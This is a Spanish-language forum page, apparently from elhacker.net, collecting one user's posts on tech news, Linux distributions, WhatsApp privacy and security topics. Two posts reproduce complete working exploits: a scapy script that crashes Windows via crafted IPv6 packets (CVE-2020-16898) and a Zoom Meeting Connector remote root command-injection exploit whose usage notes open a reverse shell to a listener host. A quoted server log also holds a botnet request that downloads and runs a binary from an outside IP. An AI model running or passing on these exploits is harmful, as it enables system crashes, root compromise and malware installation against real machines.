Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - el-brujo

#46
WhatsApp actualiza su Política de privacidad y Términos de servicio, haciendo que el intercambio de datos con Facebook sea obligatorio para todos. IMPORTANTE: debes aceptarlo antes del 8 de febrero; de lo contrario, tu cuenta será BORRADA.

https://faq.whatsapp.com/general/security-and-privacy/how-we-work-with-the-facebook-companies?eea=1

Los usuarios de WhatsApp que no estén de acuerdo con sus términos revisados antes del 8 de febrero tendrán sus cuentas inaccesibles, WhatsApp eventualmente terminará eliminando las cuentas después de 120 días de inactividad.



¿Si soy ciudadano de la Unión Europea?

Las condiciones para los ciudadanos de la UE son algo distintas ya que, sus condiciones de uso para la Unión Europea son distintas y recogen lo siguiente:

La principal diferencia reside en que, gracias al Reglamento General de Protección de Datos, los ciudadanos de la UE recibimos servicio de WhatsApp Ireland Limited y no de WhatsApp LLC.

Fuente:
https://derechodelared.com/whatsapp-cambios-privacidad-usuarios/
#47
Código (python) [Seleccionar]
#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
     Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
             IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
   send(p)



Vaya, es repetido, ya lo puse en:

https://foro.elhacker.net/bugs_y_exploits/ping_de_la_muerte_para_windows_10_ipv6-t507320.0.html
#48
Zoom version 4.6.239.20200613 suffers from a Meeting Connector post-authentication remote root code execution vulnerability via the proxy server functionality. The latest Zoom client has this issue patched per Zoom.

Código (python) [Seleccionar]
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# zoomer.py
#
# Zoom Meeting Connector Post-auth Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# The Meeting Connector Web Console listens on port 5480. On the dashboard
# under Network -> Proxy, one can enable a proxy server. All of the fields
# are sanitized to a certain degree, even the developers noting in the proxy()
# function within backend\webconsole\WebConsole\net.py that they explicitly
# were concerned with command injection and attempted to prevent it:
#
# if ('"' in proxy_name) or ('"' in proxy_passwd):  # " double quotes cannot be used to prevent shell injection
#     is_valid = False
#
# It makes sense to leave some flexibility in the character limits here
# passwords are often expected to contain more than alphanumeric characters.
# But of course that means the Proxy Password field is still vulnerable to
# command injection with the ` character.
#
# The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
# Every three minutes, a task runs which executes this proxy script as root.
# After submission the dashboard says "The proxy will take effect after the
# server reboot!", but the commands will still be executed within actually
# requiring a reboot. Keep in mind that the commands will be executed blind.
#
# For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
# this in the /tmp/proxy_test file:
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
#
# MMR was tested, but Controller and VRC may also be vulnerable
#
# Usage
# > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
# login succeeded
# command sent to server
#
# $ nc -u -lvp 5555
# ....
# sh: no job control in this shell
# sh-4.2# pwd
# /root
# sh-4.2#
#
# setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
# check tokens in /opt/zoom/conf/register, check out the local environment, etc.
#
# Dependencies
# - pip install pyquery
#
# Fix
# Zoom says they've fixed this in the latest version
#

import os
import sys
import argparse
import requests
import urllib.parse
from pyquery import PyQuery
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class Zoomer(object):
  def __init__(self, args):
    self.target = args.target
    self.port = args.port
    self.username = args.username
    self.password = args.password
    self.command = args.command

  def run(self):
    target = "https://" + self.target + ':' + str(self.port)

    session = requests.Session()
    session.verify = False

    #
    # get csrftoken from /login and use it to auth with creds
    #
    try:
      resp = session.get(target + "/login")
    except Exception as error:
      print("Error: %s" % error)
      return -1

    try:
      csrftoken = resp.headers['set-cookie'].split(';')[0]
    except:
      print("Error: couldn't parse csrftoken from response header")
      return -1

    csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')

    if(csrfmiddlewaretoken == None):
      return -1

    data = \
      {'csrfmiddlewaretoken':csrfmiddlewaretoken,
      'name':self.username,
      'password':self.password}

    headers = \
      {'Host':self.target + ':' + str(self.port),
      'Referer':target,
      'Cookie':csrftoken}

    try:
      resp = session.post(target + "/login", headers=headers, data=data)
    except Exception as error:
      print("Error: %s" % error)
      return -1

    if(resp.status_code != 200 or 'Wrong' in resp.text):
      print("login failed")
      return -1
    else:
      print("login succeeded")

    #
    # get csrfmiddlewaretoken from /network/proxy and post cmd
    #
    try:
      resp = session.get(target + "/network/proxy")
    except Exception as error:
      print("Error: %s" % error)
      return -1

    csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')

    cookies = session.cookies.get_dict()

    #
    # this happens with view-only users
    #
    if(len(cookies) < 2):
      print("Error: failed to get session ID")
      return -1

    command = '`' + self.command + '`'

    headers = \
      {'Host':self.target + ':' + str(self.port),
      'Referer':target,
      'Cookie': \
        'csrftoken=' + cookies['csrftoken'] + ';' + \
        'sessionid=' + cookies['sessionid']}

    data = \
      {'csrfmiddlewaretoken':csrfmiddlewaretoken,
      'proxyValue':1,
      'proxyAddr':'localhost',
      'proxyPort':8080,
      'proxyName':'test',
      'proxyPasswd':command}

    try:
      resp = session.post(target + "/network/proxy", headers=headers, data=data)
    except Exception as error:
      print("Error: %s" % error)
      return -1

    if(resp.status_code != 200):
      print("something failed")
      return -1
    else:
      print("command sent to server")

    return 0

  def get_token(self, body, name):
    token = None

    pq = PyQuery(body)

    if(name == 'csrftoken'):
      print("csrftoken")

    if(name == 'csrfmiddlewaretoken'):
      token = pq('input').attr('value')

    return token

def arg_parse():
  parser = argparse.ArgumentParser()

  parser.add_argument("target",
            type=str,
            help="Zoom server")

  parser.add_argument("-p",
            "--port",
            type=int,
            default=5480,
            help="Zoom port")

  parser.add_argument("username",
            type=str,
            help="Valid username")

  parser.add_argument("password",
            type=str,
            help="Valid password")

  parser.add_argument("command",
            type=str,
            help="Command to execute (replace space with $IFS ?)")

  args = parser.parse_args()

  return args

def main():
  args = arg_parse()

  zm = Zoomer(args)

  result = zm.run()

  if(result > 0):
    sys.exit(-1)

if(__name__ == '__main__'):
  main()

#  0day.today [2021-01-05]  #



Fuente:
https://0day.today/exploit/35584
#49
CitarComplete comprehensive archive of all 1,949 exploits added to Packet Storm in 2020.



https://packetstormsecurity.com/files/download/160738/2020-exploits.tgz
#50
Esta vulnerabilidad encontrada como CVE-2021-3007 también puede afectar algunas instancias del proyecto Laminas, el sucesor de Zend.

Zend Framework consta de paquetes PHP instalados en 570 millones veces. Los desarrolladores utilizan el marco para crear aplicaciones web orientadas a objetos.

https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md

En un exploit de prueba de concepto (PoC), el investigador demostró cómo la aplicación web phpinfo page analizó con éxito su comando del sistema "whoami" pasó a través de una solicitud HTTP serializada y devolvió el nombre de la cuenta de Windows, "nt Authority system".



En enero de 2020, Zend Framework fue migrado al proyecto Laminas con una cantidad significativa de código que simplemente se transfirió a la nueva base de código.

Por ejemplo, Zend's Stream.php La clase con el destructor antes mencionado continúa existiendo en algunas versiones de Laminas.

Considerando los poderes de PHP alrededor del 80% de los sitios de Internet De alguna manera, y dada la popularidad histórica del Zend Framework, se recomienda a los desarrolladores que revisen minuciosamente sus aplicaciones web para detectar casos de deserialización de objetos que no sean de confianza.
#51
CitarLas redes WiFi son cada vez más seguras. Aunque el protocolo WPA2 tiene vulnerabilidades, y el WPA3 todavía está por llegar a muchos operadores.

Ahora, un pequeño dispositivo aparentemente inofensivo puede ayudar a hackear redes WiFi. Este dispositivo, llamado Hash Monster, está inspirado en un Tamagochi de código libre que corre sobre el. Una plataforma portátil con chips ESP32, los cuales tienen doble núcleo, wifi y Bluetooth, son baratos y de bajo consumo. Ahora bien, la misión de esta mascota es capturar handshakes PSK de redes WPA y WPA2 y otros hashes que contengan el PMKID, lo cual permite crackearlo luego en un PC usando hashcat, que aprovecha la excelente capacidad de paralelización que tienen las tarjetas gráficas, obteniendo así la clave en texto plano de la red.

Tanto el M5Stack como el Hash Monster son de código libre por lo que cualquiera puede montarse uno siguiendo este how-to.


¿Te gustaría tener una herramienta de captura de WiFi portátil que quepa en su bolsillo? Un dispositivo que guarda las capturas de PCAP en una tarjeta micro sd para luego revisarlas en Wireshark o descifrar esas contraseñas WPA / WPA2. Suena como algo sacado del conjunto de herramientas WiFi espía de la NSA, pero es muy fácil de configurar con el ESP32 WiFi Hash Monster y el kit de desarrollo de IoT M5Stack CORE de $ 35.



El monstruo hash

Si ahora está pensando que parece similar al proyecto Pwnagotchi y no es causal, G4lile0, el autor de Hash Monster, se inspiró en él para hacer una alternativa que se ejecuta en el M5 Stack Development Kit, una plataforma portátil con tecnología ESP32. ESP32 es una serie de sistemas de doble núcleo de hasta 240 Mhz, de bajo costo y bajo consumo en un microcontrolador de chip con Wi-Fi integrado y Bluetooth / BLE de modo dual.

https://github.com/evilsocket/pwnagotchi

Pwnagotchies un dispositivo similar a tamagochi que funciona con bettercap y se ejecuta en una Raspberry Pi Zero W que aprende de su entorno WiFi circundante para maximizar el material de clave WPA que se puede romper que captura (ya sea mediante rastreo pasivo o realizando ataques de desautenticación y asociación). Este material se recopila en el disco como archivos PCAP que contienen cualquier forma de apretón de manos compatible con hashcat, incluidos apretones de manos WPA completos y medios, así como PMKID. O dicho rápido, es un tamagochi que come apretones de manos WiFi para ser feliz.



Hash Monster se ejecuta en un tamaño más pequeño y una plataforma más barata superior al Pwnagotchi en varios aspectos. Si bien Pwnagotchi se basa en Raspberry Pi Zero y requiere ensamblar un kit de bricolaje con varios componentes, como una pantalla eInk y un banco de energía externo, el Hash Monster funciona directamente en el pequeño dispositivo M5Stack. M5 Stack combina un ESP32 con una pequeña pantalla LCD, botones y batería interna. Es un dispositivo modular, apilable, escalable y portátil que se alimenta con un núcleo ESP-32, lo que lo hace de código abierto, de bajo costo, con todas las funciones y fácil para los desarrolladores manejar el desarrollo de productos ESP32 IoT. Puede programar M5Stack a través de Arduino, C ++, Blockly o MicroPython, por nombrar algunos. El kit de desarrollo completo para M5 Stack ofrece un precio asequible y recursos completos, lo que lo convierte en un buen kit de inicio para explorar ESP32. Si bien el M5 Stack incluye una batería incorporada de 110 mAh, se puede actualizar con un módulo de extensión de batería lipo apilable de 700 mAh.

La similitud entre Pwnagotchi y Hash Monster es que capturan tanto los apretones de manos de PSK de las redes WPA / WPA2 como los hash de PSK contenidos en marcos de baliza con PMKID. Una gran ventaja del descifrado de PMKID es que todo lo que necesita está disponible por aire, incluso si no hay estaciones conectadas y solo se requiere una captura de paquete. Posteriormente podremos crackear estos hashes con herramientas estándar como aircrack o hashcat, y así obtener las credenciales. Por supuesto, solo deberíamos hacer esto en redes que gestionamos nosotros mismos o que tenemos permiso para auditar.

https://github.com/G4lile0/ESP32-WiFi-Hash-Monster


Fuente y más información (en inglés)
https://telescope.ac/petazzoni/the-hash-monster-esp32-tamagotchi-for-wifi-cracking
#52
LineageOS, la ROM personalizada por excelencia, es capaz de permitirnos darle nueva vida a nuestro dispositivo de hace tres o cuatro años. El "milagro" no es ese, sino que LineageOS sea capaz hoy en día de revivir terminales como el Samsung Galaxy S2 que se lanzó en 2011, de ser una opción excepcional para terminales muy (pero muy) baratos.

En 2011 llegaba el Galaxy S2 (o S II), el buque insignia de una Samsung que se posicionaba como la referencia clara del mercado Android. Contaba con una pantalla Super AMOLED de 4,3 pulgadas y 800x480 píxeles, un Exynos 4210 dual-core, 1 GB de RAM y 16 o 32 GB de capacidad, además de 1.650 mAh de batería y una cámara de 8 MP f/2.6 que para la época era una pequeña maravilla. ¿Su otro detalle importante? Que el sistema operativo preinstalado era Android 2.3.4 'Gingerbread'.

Gracias a la versión no oficial de LineageOS 18.1 que un desarrollador (o "cocinero", como se les suele conocer) ha preparado para que este terminal pueda disfrutar de las ventajas de esta ROM basada en Android 11. Alucinante.

Este es un buen ejemplo de cómo LineageOS permite rescatar dispositivos del pasado sin aparentes problemas. El soporte a viejos dispositivos sigue siendo excepcional, y entre los móviles míticos en los que aún puedes instalar este sistema operativo están el Xiaomi Mi 3 (2013), LG Nexus 4 (2012), HTC One (2013), LG G2 (2013), Motorola Moto G (2013), y cómo no uno de los referentes de la comunidad de cocineros, el OnePlus One (2014).

Soporte móviles viejos:
https://wiki.lineageos.org/devices/

Y eso si solo tenemos en cuenta el soporte oficial, porque el Galaxy S2 es un ejemplo de ese otro soporte "oficioso" que cocineros que van por libre acaban ofreciendo a terminales que quieren seguir soportando. Aquí hay ejemplos como el del mítico HTC HD2 de 2009 que no tiene versión tan actual, pero que sí es posible actualizar a LineageOS 15.1 (basado en Android 8.1), algo alucinante para un terminal que ya tiene 11 años de vida.

HTC HD2
https://forum.xda-developers.com/t/lineageos-15-1-android-8-1-for-htc-hd2.4058195/

En Reddit comentaban hace tiempo algunos ejemplos que pueden dar buen servicio a sus propietarios como un Galaxy S5, un ZTE Axon mini, un Nexus 5 o un Moto G4 Play. Muchos de ellos se pueden conseguir por 50 euros o menos si sabemos buscar.

https://www.reddit.com/r/LineageOS/comments/7vlz0i/cheapest_lineage_os_supported_phone/

Fuente:
https://www.xataka.com/moviles/lineageos-maravilla-resucita-al-samsung-galaxy-s2-2011-tambien-pone-android-rpi-4-terminales-muy-baratos
#53
Me extraña que nadie haya comentado una de las noticias del año en GNU/Linux

Red Hat detiene el desarrollo de CentOS 8 en favor de CentOS Stream

RedHat anunció el fin del proyecto CentOS Linux, se apresuró a dejar claro que el nuevo "CentOS Stream no es un reemplazo" para dicha distribución, hasta ahora la más popular en el ámbito de los servidores junto a Debian y Ubuntu.

Y es cierto: CentOS Stream, al contrario de CentOS Linux, actuará como versión de desarrollo de Red Hat Enterprise Linux, en lugar de limitarse a recompilar los binarios de ésta sin referencias a las marcas y logos de Red Hat (y, por lo tanto, de forma gratuita).

La comunidad de CentOS aceptó pasar a ser patrocinada por RedHat, poniendo en sus manos la marca y el futuro de la distribución, y pasando sus desarrolladores a engrosar la plantilla de la compañía. A cambio, Red Hat debía salvaguardar la naturaleza del proyecto.

Pero ahora, tan sólo un año después de la adquisición de Red Hat por parte de IBM, dicha promesa ha sido traicionada. Eso por no hablar de la promesa de mantener el soporte de cada versión de CentOS durante 10 años, muy apreciada dado el tipo de entornos donde se instalaba, pero que será vulnerada en el caso de CentOS, cuyo soporte ahora finalizará en 2021.

Red Hat recomienda que los usuarios de CentOS 8 migren a CentOS Stream, indicando que habrá pequeñas diferencias con las versiones de RHEL y que las actualizaciones se publicarán con regularidad, de forma similar a CentOS tradicional.

Como ejemplo de empresas que ya utilizan CentOS Stream en sus infraestructuras se menciona Facebook, que ha migrado sus servidores a su propia distribución basada en CentOS Stream.

CloudLinux y el nuevo Rocky Linux salen al rescate de los usuarios de CentOS tras el volantazo de Red Hat

Rocky Linux



uno de los co-creadores de CentOS, Gregory Kurtzer, quien aprovechó el momento de desconcierto para animar a usuarios y desarrolladores a unirse a un nuevo proyecto comunitario basado en RHEL y que, además, facilite la transición desde CentOS a la nueva distribución.

Este nuevo proyecto nacía con poco respaldo más que la influencia de Kurtzer y un nombre, Rocky Linux, otorgado en honor al otro co-creador de CentOS, el ya fallecido Rocky McGough. Pero en poco más de dos días ha logrado poner a 750 voluntarios bajo su bandera, decididos a recuperar el espíritu del proyecto CentOS.

CloudLinux

Si antes has echado en falta una mención a CloudLinux entre las alternativas a CentOS no te falta razón: también es una distribución basada en RHEL y muy bien valorada en el ámbito de los servidores.

Sin embargo, al contrario que Scientific Linux, Oracle Linux y, con el tiempo, Rocky Linux, CloudLinux no es un mero clónico de RHEL, sino que introduce cambios dirigidos a optimizar el sistema para la tarea de proporcionar alojamientos compartidos.

Eso no ha impedido a los responsables de esta distribución anunciar la creación de una nueva distribución paralela, comunitaria y gratuita, que se ajuste el esquema seguido hasta ahora por CentOS, aprovechando que ya cuentan con "toda la infraestructura, software y experiencia necesarios". Aunque aún carece de nombre, su lanzamiento tendrá lugar durante el primer trimestre de 2021.

Fuentes:
https://www.genbeta.com/linux/cloudlinux-nuevo-rocky-linux-salen-al-rescate-usuarios-centos-volantazo-red-hat
#54


Para celebrar el 20 aniversario de elhacker.NET (Febrero de 2001-Febrero 2021) el foro actual será migrado a un nuevo servidor dedicado (12 cores, 128GB de ram y discos raid 1 nvme).

Pero la novedad más importante es la migración actual del sistema de foros que utilizamos SMF 1 a SMF 2

El foro está siendo migrando (pruebas) de SMF 1 a SMF 2, no sin algunos problemas previos. Ya que las modificaciones del SMF 1.x que estamos usando no son precisamente pocas.

En principio se migrará lógicamente todo el contenido (mensajes, foros, usuarios, etc). Se pasará a de usar el charset  ISO-8859-1 a UTF-8, tanto en los ficheros de idioma con en la BD que también se convertirá InnoDB (ahora usa MyISAM). También se redireccionarán las URL's antiguas a las nuevas para no perder los enlaces internos y externos del foro (de Seo4SMF a Pretty URL's)

Se conservarán las plantillas actuales (diseño de los themes), pero se cambiará la plantilla por defecto actual.

Se migrarán y adaptarán y los mods actuales:

Listado de Mods (modificaciones que estamos usando)
- sha + passwordSalt de las contraseñas del foro
- Youtube Tag Code
- GeShi (editor de código)
- Tag Youtube
- LaTex (formulas matemáticas)
- Security Login (aviso por e-mail intentos fallido a parte de bloqueos automáticos)

Y la idea será añadir nuevas características que pidan los usuarios:

Mods nuevos (características)
O implementar (2FA, WAP, mobile version, reponsive theme), creación de nuevos foros, subforos e incluso categorías.

También sería muy interesante acabar la re-estructuración y reorganización de los foros y subforos actuales para una mejor ordenación. Durante el año 2020 sólo se han realizado pequeños cambios de nombre de foros y subforos.

elhacker.NET will never die
#55
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Citar85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


Creo que será interesante publicar el  log de mod_security del servidor web para ver la cantidad inhumana de peticiones.
#56
Un crecimiento de más del 5,5% durante las últimas 24 horas y más del 170% en lo que llevamos de año.


El bitcoin supera la barrera de los 20.000 dólares por primera vez en su historia


La famosa criptomoneda alcanzó su valor máximo y ha triplicado su precio desde principios de año. Sin embargo, muchos expertos e inversionistas consideran que el bitcoin sigue teniendo mucha volatilidad.



Desde principios de año el bitcoin ha subido cerca de un 190%, impulsado por el interés de inversores tradicionales que desconfiaban antes de esta criptomoneda. Pero el precio empezó realmente a dispararse a fines de octubre por el lanzamiento de un servicio de compra, venta y pago por criptomoneda del gigante de pagos Paypal. Desde entonces esta criptomoneda ha ganado más de un 40%
#57
Estas vulnerabilidades, causadas por un error en el controlador TCP/IP de Windows, se remontan a la vulnerabilidad "Ping de la muerte" corregida en 2013. Hacen posible la denegación de servicio y la posible ejecución remota de código.

La vulnerabilidad en tcpip.sys, un error lógico en la forma en que el controlador analiza los mensajes ICMP, se puede activar de forma remota con un mensaje router advertisement IPv6 especialmente diseñado que contenga una opción de servidor DNS recursivo (RDNSS). La opción RDNSS normalmente contiene una lista de las direcciones IPv6 de uno o más servidores DNS recursivos.




Hay una falla lógica en tcpip.sys que puede explotarse creando un paquete de router advertisement que contenga más datos de los esperados, lo que da como resultado que el controlador coloque más bytes de datos en su pila de memoria de los previstos en el código del controlador, por lo que se produce un desbordamiento de búfer. En teoría, esto podría usarse tanto para denegación de servicio como para ataques de ejecución remota de código. Pero en la práctica, lograr la ejecución remota de código sería extremadamente difícil.

SophosLabs desarrolló su propia prueba de concepto para un ataque, basada en la información proporcionada por Microsoft. Aprovechando la vulnerabilidad para causar una "pantalla azul de la muerte" BSOD en el ordenador de la víctima. Los detalles de la POC no los publicamos por ahora para evitar la explotación por parte de ciberdelincuentes.

Una vez que entendimos el error, desarrollar una prueba de concepto de "Pantalla azul de la muerte" fue bastante sencillo. Pero llevarlo al nivel que Microsoft advirtió es posible (la ejecución remota de código) no es tan sencillo. Los estándares y prácticas de codificación modernas ralentizarían el esfuerzo por construir un exploit RCE genérico confiable, por dos razones.

Primero, TcpIp.sys se compila con bandera GS, que evita que un desbordamiento de pila típico controle directamente la dirección de retorno.



La cookie de pila, también conocida como canario de pila, es un valor aleatorio generado en el momento de la carga. Su valor es XOR con el puntero de pila, lo que hace que sea extremadamente difícil predecir de manera confiable, especialmente en una explotación remota completa.




Hay dos técnicas típicas que se utilizan para omitir los canarios de pila, ninguna de las cuales se aplica realmente en este caso:

   Usar otra vulnerabilidad de fuga de información (lectura arbitraria), que no ayudará mucho a explotar tcpdrv.sys, porque el valor canario es XOR con el puntero de pila.
   Sobrescritura de un controlador de manejo de excepciones estructurado (SEH), que sería útil solo si se ha establecido un registro de excepción estructurado, que no es el caso.

El segundo obstáculo para una explotación eficaz de la RCE es la aleatorización del diseño del espacio de direcciones del kernel (kASLR). Incluso si fuera posible, puede predecir de manera confiable el canario de la pila (bastante improbable) para regresar a un shell del sistema en modo de usuario que requeriría determinar correctamente (y nuevamente de forma remota) la dirección base del kernel de Windows.

Eso significa que incluso cuando la naturaleza exacta del error en tcpdrv.sys se haga más conocida, puede pasar algún tiempo antes de que alguien pueda explotarlo de una manera que inyecte código de manera confiable en el espacio del kernel de Windows. Aun así, la amenaza de denegación de servicio a voluntad con un paquete de fácil elaboración debería ser suficiente por sí sola para provocar un parcheo rápido, que es la única solución real para esta vulnerabilidad.

Otras mitigaciones a corto plazo para posibles ataques de denegación de servicio incluyen:

   Desactivar IPv6 si no se utiliza, o
   Obligar a Windows a descartar los paquetes de router advertisement usando el comando

netsh (netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable).

[youtube=640,360]https://youtu.be/X5CzXuq8-3w[/youtube]


CitarIn a proof-of-concept published on October 13, 2020, the SophosLabs Offensive Security team demonstrates one possible exploit against a bug in Windows computers that can remotely execute code simply by sending a specially crafted IP version 6 packet at a vulnerable computer. While this demo does not show remote code executing, it does show that the exploit path for the bug is functional (but has been mitigated by protections Microsoft introduced into Windows 10) and demonstrates that this PoCg is capable of causing a "blue screen of death" on Windows computers, which may create other problems. With additional work, it will be possible, eventually, to execute arbitrary code without crashing the PC in the process.

Fuentes:
https://news.sophos.com/es-es/2020/10/14/la-razon-principal-para-instalar-los-parches-de-microsoft-de-octubre-de-2020-ping-de-la-muerte-redux/

https://blog.elhacker.net/2020/10/actualizaciones-de-seguridad-productos.html
#58
Operadora   Sistema autónomo   Tipo de bloqueo
Movistar   3352   Inspección de paquetes con FortiGate
Vodafone   12430   Inspección de paquetes con Allot
Orange   12479   Bloqueo DNS resolviendo a 127.0.0.1
MásMóvil   15704   Inspección de paquetes
Yoigo   16299   Bloqueo DNS resolviendo a 192.168.1.254
Euskaltel   12338   Bloqueo DNS no resuelve

Las operadoras ejercen el bloqueo principalmente mediante dos sistemas. El primero y más sencillo es falseando la respuesta del servidor DNS, de forma que el usuario intenta acceder a una dirección IP que no tiene un servidor web escuchando, resultando en un error de navegación. Es el sistema utilizado por Orange, MásMóvil en la red móvil de Yoigo y Euskaltel.

El segundo método, mucho más efectivo, consiste en inspeccionar el tráfico del usuario analizando la conversación entre nuestro dispositivo y el servidor de destino para descubrir si estamos accediendo a una de las webs prohibidas. En ese caso se intercepta la comunicación enviándonos una respuesta falsa en forma de un HTML con un error. Es el sistema que utilizan Movistar, Vodafone y MásMóvil en su red fija. La inspección DPI es efectiva incluso cuando accedemos sobre HTTPS, al analizar el diálogo inicial en el que el navegador cliente manda en texto plano el nombre del dominio al que desea acceder.

Fuente:
https://bandaancha.eu/articulos/como-bloquean-webs-descarga-streaming-9760

En teoría cambiando las DNS de la operadora y utilizando ESNI en el navegador problema resuelto  ;-)



https://www.cloudflare.com/es-es/ssl/encrypted-sni/

Servidores DNS gratuitos y seguros, compatibles con DoH y DoT
https://blog.elhacker.net/2019/11/servidores-dns-gratuitos-y-seguros-compatibles-doh-dot-tls-https-firefox-chrome-android.html

Server Name Indication - SNI vs E-SNI
https://blog.elhacker.net/2020/08/china-esta-bloqueando-todo-el-trafico-web-https-tls-esni.html
#59
Google Maps ya muestra la capa de COVID-19 con información de casos nuevos por regiones





Mantenerse al día de la evolución de la pandemia es ahora tan fácil como abrir Google Maps, al menos en lo que a número de casos recientes se supone. Esta capa te permite visualizar sobre el mapa el número de casos nuevos en los últimos siete días y la tendencia, si es al alza o a la baja.


Nueva capa de COVID-19 en Google Maps

